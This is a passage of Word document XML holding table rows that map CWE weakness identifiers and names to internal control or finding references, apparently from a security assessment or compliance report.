          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-284</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-08, CF-10, PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-285</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-09, PB2-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-295</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Certificate Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-03, PB2-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-312</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cleartext Storage of Sensitive Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-03, PB2-08, SEC-03, SEC-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-319</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cleartext Transmission of Sensitive Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-330</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-338</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-345</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Insufficient Verification of Data Authenticity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-03, DET-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-349</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Acceptance of Extraneous Untrusted Data With Trusted Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-03, DET-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-357</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-359</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exposure of Private Personal Information to an Unauthorized Actor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-390</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection of Error Condition Without Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-09, PB1-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-391</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unchecked Error Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-396</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-09, PB2-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-409</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Handling of Highly Compressed Data (Data Amplification)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-426</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-427</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-08, DEP-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-459</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-471</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
